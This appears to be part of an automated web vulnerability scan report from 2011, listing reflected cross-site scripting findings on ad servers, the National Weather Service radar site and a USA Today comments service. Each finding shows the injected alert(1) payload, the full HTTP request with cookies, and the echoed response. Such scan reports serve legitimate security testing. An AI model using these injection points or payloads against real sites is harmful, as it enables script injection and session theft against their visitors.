2.93. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9c43'%3balert(1)//bb09889184a was submitted in the redir parameter. This input was echoed as f9c43';alert(1)//bb09889184a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-45954758_1304955419,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-45954758_1304955419%2C11f8f328940989e%2Cweath%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D310802%3Bcontx%3Dweath%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D%5Btimestamp%5D%3Ff9c43'%3balert(1)//bb09889184a HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_VsdNmQotNi@m4]2M2UNvB^a*m(qsP<$5Y8+$btG4Ak815t9uZT9Y!Tss2(U=u08T#U*@.xf`p:/Y=@C'V`%3VDqSpO@2LNZ!a`mkrE=4S%OOWjxx?I%f.`8P<Q_=:K!N$S@p'W+mpx*RcdvEi=A'#X@PH+HTK.^[b/a`!b`#0B@$kf.F^2QqXMVbeza'$l/3mV)X=JbA6Dg2elt<r$Y2-LH'3+IRb[FhsHCNft/g2g4RKbYm([]%2pZmoc2O!J^AMCh5bcwNx(n]g=GtY31<eFv=Py[$vPQoKQvElD]jJ?WfA/mkYXJ7^YX%RfRfRP:B4Z:9)LOWaVQ._BYWVIt9SF3qfRr>MH2W4cYAiW:f92EX!%l#-=WZMff'fhbMApWS<YV1Fhq@f^5^1!7tcd#9Tdp::!P@XBy<13HmsxW[=X*.JJZAZnXKfBb0ZkTQDm.8h6r:GEYo'apKW77#x>UomXwbCI8b[s00xdd5UEfSDB=f<o'@gNUP)v6ITb?O-]le_)Ef0+aq9aCbvK/[`(!X92Jj!xp88_699MG!SR'2XPaU>9U<.1_BU7EhhEGpC$Dl]#Jj1o$JVk<kds/pZAV[23<*Wg2v^crt$`<vw8HjZ)4K>b:4bVPY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIhboCEAoYASABKAEwzJSg7gQQzJSg7gQYAA..; path=/; expires=Sun, 07-Aug-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb681375=5_[r^kI/7Zw[-!!0nf8MPcQ6y?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jP7g4Zc5yxUl_SsYda6b2ziVMCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAlg8BAgUCAAUAAAAAxiWa4gAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955460%29%3Buf%28%27c%27%2C+61473%2C+1304955460%29%3Buf%28%27r%27%2C+272040%2C+1304955460%29%3Bppv%287166%2C+%279172079212996409528%27%2C+1304955460%2C+1336491460%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_VtN.!fFc)4A9CkOy>5#Y2:H9+'(s':?6bLT2bujaqZM1q=3$<oxAN2R+-Q=f*ZD9q01F/yR!pPep@lhr?6lR5#u^LepX@-Bq@%t>BCt6LR9nqEku7!%x^cbAH:CBp4SoB_g)flf'+AW^8$vA%+R@BlT0>Og>^(#8Df^Mjo0*A?Rk8fO`zgI/(/6j]*nXBx`1s6=M3kv/VxS`aeS9/q?'v_7C+:@wG$N2=H<:IL#14#$D?40tLzI7=H'2$jLWN7CRm/8$vYZ!X@-8eFH`<@QU6Hj+1jDBpEB`8OjKb'GjgX8RAnuKCH.)XGBs/J*S:!cS[S?s$.iZwpczluvIHD7:hcBh=OMr6>JCzU3a>.GYzcjXc/wl$jxr6gM]N:Juk`F$fOJ>VqTH878oNWsnzJf=VOiSkZWN62OH1jwf[jvq%+U<RPfFF?JO'GuCZTEo.S'$TmrW>o(Q%@XomCXfdO.cX7MxB^OTpJ)U_<-[pmSCx0$Tnvy]D=wvcAfmROfiaS6^vmJJpx.1]4YgsAD[$hbMf827(omrkIHMu4m(=%V4yO-<vwSX0@uimPr?_!$6mB1.>xJj+Km$psS8m[pFyvxb1!cI4mu./=I>2v+AHbIE.bvpEgK*U.!FLR(G7Qv#Y*; path=/; expires=Sun, 07-Aug-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 15:37:48 GMT
Content-Length: 729

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rub_usatoday/;net=cm;u=,cm-45954758_1304955419,11f8f328940989e,weath,ax.40-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-b
...[SNIP]...
310802;contx=weath;an=40;dc=w;btg=am.h;btg=am.b;btg=cm.ent_h;btg=cm.music_h;btg=ti.aal;btg=bz.25;btg=dx.16;btg=dx.23;btg=dx.17;btg=rt.truecredit2;btg=qc.ae;btg=qc.ac;btg=idgt.careers_l;ord=[timestamp]?f9c43';alert(1)//bb09889184a">
...[SNIP]...

2.94. http://k.collective-media.net/cmadj/cm.rub_usatoday/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rub_usatoday/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61f30'-alert(1)-'6f7e06a5860 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rub_usatoday61f30'-alert(1)-'6f7e06a5860/;sz=728x90;net=cm;ord=[timestamp];env=ifr;ord1=310802;cmpgurl=http%253A//www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:07 GMT
Connection: close
Set-Cookie: mmpg=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:37:07 GMT
Content-Length: 8102

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-87265582_1304955427","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rub_usatoday61f30'-alert(1)-'6f7e06a5860&size=728x90&imp_id=cm-87265582_1304955427,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.n
...[SNIP]...

2.95. http://radar.weather.gov/Conus/images/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad9d8"><script>alert(1)</script>e5caccb3aa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Conus/images/ad9d8"><script>alert(1)</script>e5caccb3aa0 HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14139
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="choices" size="30" value="http://radar.weather.gov/Conus/images/ad9d8"><script>alert(1)</script>e5caccb3aa0">
...[SNIP]...

2.96. http://radar.weather.gov/Conus/images/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8d560<script>alert(1)</script>b7ea99d8653 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Conus/images/8d560<script>alert(1)</script>b7ea99d8653 HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14127
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<b>http://radar.weather.gov/Conus/images/8d560<script>alert(1)</script>b7ea99d8653</b>
...[SNIP]...

2.97. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7a3aa<script>alert(1)</script>141b81665a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Conus7a3aa<script>alert(1)</script>141b81665a4/index.php HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14149
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<b>http://radar.weather.gov/Conus7a3aa<script>alert(1)</script>141b81665a4/index.php</b>
...[SNIP]...

2.98. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 30135'><a>4523c2d38fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Conus30135'><a>4523c2d38fe/index.php HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 13944
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<a href='http://radar.weather.gov/Conus30135'><a>4523c2d38fe'>
...[SNIP]...

2.99. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9caa"><script>alert(1)</script>21f22c9fe5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Conuse9caa"><script>alert(1)</script>21f22c9fe5f/index.php HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14163
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="choices" size="30" value="http://radar.weather.gov/Conuse9caa"><script>alert(1)</script>21f22c9fe5f/index.php">
...[SNIP]...

2.100. http://radar.weather.gov/Conus/index.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 998aa"><script>alert(1)</script>932b00c7820 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Conus/998aa"><script>alert(1)</script>932b00c7820 HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14067
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="choices" size="30" value="http://radar.weather.gov/Conus/998aa"><script>alert(1)</script>932b00c7820">
...[SNIP]...

2.101. http://radar.weather.gov/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9220f"><script>alert(1)</script>9368837639a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/9220f"><script>alert(1)</script>9368837639a HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 15248
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="choices" size="30" value="http://radar.weather.gov/images/9220f"><script>alert(1)</script>9368837639a">
...[SNIP]...

2.102. http://radar.weather.gov/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d22b5<script>alert(1)</script>e731b910b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/d22b5<script>alert(1)</script>e731b910b3 HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 15232
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<b>http://radar.weather.gov/images/d22b5<script>alert(1)</script>e731b910b3</b>
...[SNIP]...

2.103. http://radar.weather.gov/radar.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /radar.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d24f"><script>alert(1)</script>beb2182b5f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /6d24f"><script>alert(1)</script>beb2182b5f0?rid=hdx&product=N0R&overlay=11101111&loop=no HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://radar.weather.gov/Conus/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 14136
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-
...[SNIP]...
<input type="text" name="choices" size="30" value="http://radar.weather.gov/6d24f"><script>alert(1)</script>beb2182b5f0?rid=hdx&product=N0R&overlay=11101111&loop=no">
...[SNIP]...

2.104. http://radar.weather.gov/radar.php [product parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /radar.php

Issue detail

The value of the product request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e333"%3balert(1)//b50d5d274da was submitted in the product parameter. This input was echoed as 7e333";alert(1)//b50d5d274da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /radar.php?rid=hdx&product=N0R7e333"%3balert(1)//b50d5d274da&overlay=11101111&loop=no HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://radar.weather.gov/Conus/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 09 May 2011 15:43:02 GMT
Date: Mon, 09 May 2011 15:38:02 GMT
Connection: close
Content-Length: 25375

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head>
<title>NWS radar image from Holloman Air Force Base, NM</title>
<meta name=
...[SNIP]...
t.checkform1." + objs[i]);
theObj.checked = true;
} else {
    theObj = eval("document.checkform1." + objs[i]);
    theObj.checked = false;
   }
   changeVisibility(theObj,i);
}
theProduct = "N0R7E333";ALERT(1)//B50D5D274DA";
var dt = "datetime";
getnewimg(theProduct,'HDX',0,dt);
}
function go(loop) { window.location.href = loop; }
function newpage(radarid,product,loop) {
   var cbox;
   var isloop = (loop==1
...[SNIP]...

2.105. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 110ce<script>alert(1)</script>11b5095b103 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=46732364.story&plckarticleurl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckarticletitle=Levee%2520blasted%2520along%2520Mississippi%2520River%2520to%2520spare%2520Cairo%252C%2520Ill.&clientUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&cb=plcb0110ce<script>alert(1)</script>11b5095b103 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:39:12 GMT
Connection: close
Content-Length: 94408

